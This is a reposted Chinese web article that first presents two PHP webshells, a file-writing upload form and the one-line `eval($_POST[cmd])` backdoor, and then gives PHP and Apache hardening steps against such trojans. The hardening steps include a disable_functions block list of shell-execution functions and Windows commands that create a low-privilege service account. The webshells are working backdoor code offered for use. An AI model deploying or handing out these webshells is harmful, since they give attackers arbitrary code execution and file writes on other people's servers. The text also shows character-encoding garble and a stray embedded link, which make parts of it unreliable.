|
復(fù)制代碼 代碼如下:
<?php
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
<form method="POST">
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('//','/',__FILE__) ?>">
<br><br>
<textarea name="text" COLS="70" ROWS="18" ></textarea>
<br><br>
<input type="submit" name="submit" value="保存">
<form>
<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失敗!';
@fclose($fp);
}
?>
一句話php木馬
復(fù)制代碼 代碼如下:
<?php eval($_POST[cmd]);?>
php木馬的防范方法
php是能讓你生成動(dòng)態(tài)網(wǎng)頁的工具之一。php網(wǎng)頁文件被當(dāng)作一般HTML網(wǎng)頁文件來處理并且在編輯時(shí)你可以用編輯HTML的常規(guī)方法編寫php。
php代表,超文本預(yù)處理器(php: Hypertext Preprocessor),可以從php官方站點(diǎn)(http://www.php.NET)自由下載。php遵守GNU公共許可(GPL),在這一許可下誕生了許多流行的軟件諸如Linux和Emacs。php在大多數(shù)Unix平臺(tái),GUN/Linux和微軟Windows平臺(tái)上均可以運(yùn)行。怎樣在Windows環(huán)境的PC機(jī)器或Unix機(jī)器上安裝php的資料可以在php官方站點(diǎn)上找到。安裝過程很簡(jiǎn)單。
php的另一好處就在于他的安全性,隨著現(xiàn)在互聯(lián)網(wǎng)的發(fā)展,網(wǎng)絡(luò)安全越來越受重視,php的誕生幾乎代替了ASP,因?yàn)?a href=/itjie/phpjishu/ target=_blank class=infotextkey>php對(duì)于安全方面的設(shè)置是極為簡(jiǎn)單的不像ASP那樣需要很多的步驟,和禁用很多的服務(wù)。不過再好的東西也始終會(huì)有不足,如果默認(rèn)設(shè)置的php同意也是不堪一擊,因此本文就來講一下如何對(duì)php進(jìn)行一些安全方面的配置,來防止腳本木馬的破壞。
一、防止php木馬執(zhí)行webshell
打開safe_mode, 在,php.ini中設(shè)置 disable_functions= passthru,exec,shell_exec,system 二者選一即可,也可都選。
二、防止跳出web目錄
首先修改httpd.conf,如果你只允許你的php腳本程序在web目錄里操作,還可以修改httpd.conf文件限制php的操作路徑。比如你的web目錄是/usr/local/apache/htdocs,那么在httpd.conf里加上這么幾行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果腳本要讀取/usr/local/apache/htdocs以外的文件將不會(huì)被允許,如果錯(cuò)誤顯示打開的話會(huì)提示這樣的錯(cuò)誤: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木馬讀寫文件目錄
在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php處理文件的函數(shù),主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成為 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木馬拿我們沒轍了,遺憾的是這樣的話,利用文本數(shù)據(jù)庫(kù)的那些東西就都不能用了。 如果是在windos平臺(tái)下搭建的apache還需要注意一點(diǎn),apache默認(rèn)運(yùn)行是system權(quán)限,必須給apache降降權(quán)限,如下:
NET user apache f**kmicrosoft /add
NET localgroup users apache /del
此時(shí)建立了一個(gè)不屬于任何組的用戶apche,只要打開計(jì)算機(jī)管理器-服務(wù)-apache服務(wù)的屬性-log on-this account,在這里填入上面所建立的賬戶和密碼,重啟apache服務(wù)即可實(shí)現(xiàn)apache運(yùn)行在低權(quán)限下。
總結(jié):實(shí)際上還可以通過設(shè)置各個(gè)文件夾的權(quán)限,給每一個(gè)目錄建立一個(gè)單獨(dú)能讀寫的用戶,來實(shí)現(xiàn)安全。當(dāng)前很多虛擬主機(jī)提供商的流行配置方法,不過這種方法用于防止這里就顯的有點(diǎn)大材小用了。只要我們管理員有安全意識(shí),相對(duì)的禁閉不用的功能就可以保證網(wǎng)絡(luò)安全的威脅。
下面是mcafee的安全設(shè)置,防止一些網(wǎng)頁木馬生成文件等。
http://www.jb51.NET/hack/list461_1.html
php技術(shù):全世界最小的php網(wǎng)頁木馬一枚 附PHP木馬的防范方法,轉(zhuǎn)載需保留來源!
鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。